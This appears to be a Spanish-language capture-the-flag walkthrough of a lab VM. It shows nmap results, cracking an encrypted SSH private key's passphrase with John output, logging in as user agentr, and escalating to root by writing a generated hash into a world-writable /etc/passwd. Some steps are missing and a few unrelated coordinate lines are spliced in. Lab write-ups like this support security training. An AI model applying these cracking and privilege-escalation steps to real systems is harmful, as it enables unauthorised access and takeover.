Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 10:05 CEST
Nmap scan report for 192.168.5.134
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8f:ec:55:07:54:78:a4:ee:8e:d7:95:41:62:74:77:8e (RSA)
| 256 7c:67:19:8b:bf:73:b4:7f:82:64:df:d5:7b:ad:34:a4 (ECDSA)
|_ 256 a1:e7:61:a1:cc:6b:16:10:1c:71:fa:54:ed:89:fd:4c (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:CE:93:AA (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds
Gobuster
Info:
Si nos vamos a ese .txt veremos lo siguiente...
Vemos que es una id_rsa por lo que se ve tiene contraseña, por lo que haremos lo siguiente...
Info:
Veremos que la contraseña es reading por lo que haremos lo siguiente...
Vemos que en el .txt nos dijo un nombre por lo que probaremos con ese nombre agentr...
Metemos la contraseña del id_rsa y ya estariamos dentro con el usuario agentr...
Leeremos la flag del la /home...
user.txt (flag1)
Si vemos los permisos del siguiente archivo...
Info:
Vemos que podemos escribir, por lo que haremos lo siguiente...
Nos descargaremos la siguiente herramienta creada por mi (@d1se0) en github...
URL = https://github.com/D1se0/passwordGenerator
o
Info:
Generara una contraseña aleatoria poniendo el numero de letras que quiere que tenga en mi caso solo 3 para que sea corta y codificarlo en unix_passwd, por lo que ese codigo codificado es lo que tenemos que pegar en el /etc/passwd de la siguiente manera...
Quedara algo tal que asi, por lo que lo guardamos e intentamos ser root poniendo esa contraseña generada en mi caso v4l...
Y si metemos la contraseña sin codificar veremos que seremos root...
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
reading (id_rsa)
1g 0:00:00:00 DONE (2024-07-13 10:15) 2.173g/s 6678p/s 6678c/s 6678C/s kikay..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
chmod 600 id_rsa
ssh -i id_rsa agentr@<IP>
[Arabic]
الإحداثيات الأولى هي 25 درجة شمالا
[English]
The First coordinate is 25.0000° N
ls -la /etc/passwd
-rw-r--rw- 1 root root 1763 Dec 24 2020 /etc/passwd